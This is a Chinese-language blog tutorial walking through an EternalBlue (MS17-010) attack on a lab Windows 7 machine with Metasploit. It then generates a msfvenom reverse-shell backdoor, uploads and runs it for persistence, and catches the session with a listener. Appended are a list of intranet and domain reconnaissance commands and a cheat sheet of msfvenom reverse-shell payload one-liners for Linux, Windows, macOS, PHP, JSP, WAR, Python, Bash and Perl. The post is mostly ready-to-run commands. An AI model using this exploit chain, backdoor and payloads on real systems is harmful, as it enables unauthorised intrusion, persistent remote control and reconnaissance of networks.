msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

这篇具有很好参考价值的文章主要介绍了msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

学习目标:

例如:

  • 1.使用msf进行ms17_010漏洞利用(成功拿到shell截图取证)
  • 2.使用msfvonom进行权限维持(后门木马生成,利用第一步shell进行上传)
  • 3.利用msf监听模块进行监听

第一步:利用msf进行ms17_010经典漏洞攻击

1.使用nmap对靶机进行永恒之蓝漏洞扫描

命令:nmap -A 192.168.232.134

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

发现改IP存在永恒之蓝漏洞,利用msfconsole 进行攻击

命令:msfconsole   (打开msf)

           search ms17  (搜索ms17_010漏洞利用模块)

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

之后使用exp攻击模块,这里我们可以看到auxiliaray辅助模块(有兴趣的可以进行尝试)

命令:

1.use 0

2.set payload windows/x64/meterpreter/bind_tcp    (注意这里使用的时正向shell,是基于我们可以访问到对方,也可以使用reverse_tcp)

3.set rhosts 192.168.232.134

4.set target 1   (这里我们将target进行设置为window 7的有时候不设置会攻击不成功,查看所有的target的命令是:show targets)

5.run/exploit  

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

成功拿到shell。之后我们可以查看meterpreter框架shell命令有哪些

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

命令比较多,我们使用命令:screenshot 证明我们来过

 msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

到指定的位置去看一下我们的攻击结果

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

移动到桌面查看

命令:mv /root/HlRpnbbt.jpeg  /home/kali/Desktop

 msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

成功看到截图

 msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

第二步:使用msfvonom 进行木马的生成,通过上一步拿到的shell进行上传到目标机器

1.生成木马

命令:msfvonom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.232.128 LPORT=6789 -f  exe -o  /home/kali/Desktop/shell.exe

lhost是攻击机ip就是我们的kali机器 

LPORT是我们的攻击机的监听端口

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

通过第一步shell进行上传我们的木马到目标地址192.168.232.134

命令:

upload  /home/kali/Desktop/shell.exe   C:\

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

第三步,使用我们的msf监听模块进行监听

1.进入监听模块

命令:

        use   exploit/multi/handler

        set payload windows/meterpreter/reverse_tcp

        set LHOST  192.168.232.128

        set LPORT 6789

2.在第一步拿到shell的里面进入Windows7执行shell.eming

命令:

        shell

        chcp 65001

        cd C:\

        dir

        shell.exe

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

之后我们监听模块输入命令:run

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

这里出错了,没有成功session关闭,细心看我们的payload和制作木马时不一致,且忌要和制作木马时使用的payload,端口,IP一致

重新设置一下为payload 成功拿到shell

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

进入shell。可以查看

msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听

附上内网的一般信息收集命令:

ipconfig /all   # 查看本机ip,所在域
route print     # 打印路由信息
net view        # 查看局域网内其他主机名
arp -a          # 查看arp缓存
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享
net share ipc$  # 开启ipc共享
net share c$    # 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:""    # 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名"    # 建立c盘共享
dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件

net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators    # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net time /domain           // 主域服务器会同时作为时间服务器
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器(可能有多台)
net group "Enterprise Admins" /domain    // 查看域管理员组

附上:常见类型木马生成

linux

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

windows
      
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads

php

  msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

asp
   
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

jsp
   
     msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

war

   msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads

python

  msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

bash

  msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

perl

  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

完事!


总结:

1.msf攻击永恒之蓝漏洞时由于自己搭建环境不是很稳定需要多次尝试。

2.使用msfvonom 生成木马时,payload选择。

3.监听时设置的payload和生成木马时必须一致。文章来源地址https://www.toymoban.com/news/detail-439496.html

到了这里,关于msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 主机漏洞利用演示MS17-010(永恒之蓝)

    ms17-010危害:对被攻击方的电脑造成蓝屏! 申明:本篇文章的用意仅做学习使用 网络搭建环境: 软件:Vmware Workstation 17 攻击机:Kali 靶机环境:Windows 7 Nmap软件的基本功能: 1、主机发现(Host Discovery) 2、端口扫描(Port Scanning) 3、版本侦测(Version Detection) 4、操作系统侦

    2024年02月15日
    浏览(38)
  • 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻

    2024年02月07日
    浏览(39)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(31)
  • Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

    ●环境: 攻击机:Linux kali(IP:192.168.107.129) 靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的! ●永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病

    2024年02月11日
    浏览(32)
  • 浅析ms17_010(永恒之蓝)漏洞利用过程及防护措施

    一、永恒之蓝(Wannacry)漏洞简介 1)一种“蠕虫式”的勒索病毒软件,利用windows的SMB漏洞传播,可以获取System最高权限; 2)主要对windows服务器、主机有较大影响;黑客利用病毒对电脑重要文件进行加密,索要高比特币,是一种常见的 “勒索病毒” ; 3)中国部分Windows操作系统

    2024年02月13日
    浏览(26)
  • 通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录

    注意:本实验实在虚拟机中完成,旨在技术交流学习请勿用于任何违法犯罪的活动中;任何未经同意授权的渗透测试均为违法行为; 实验目的: 使用kali通过msfconsole工具,利用ms17-010漏洞获取靶机shell,创建账户远程登录到目标靶机上。 实验环境: 虚拟机环境下 攻击机:l

    2024年02月11日
    浏览(29)
  • MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)                              2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作 :

    2024年02月08日
    浏览(42)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(41)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(30)
  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(61)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包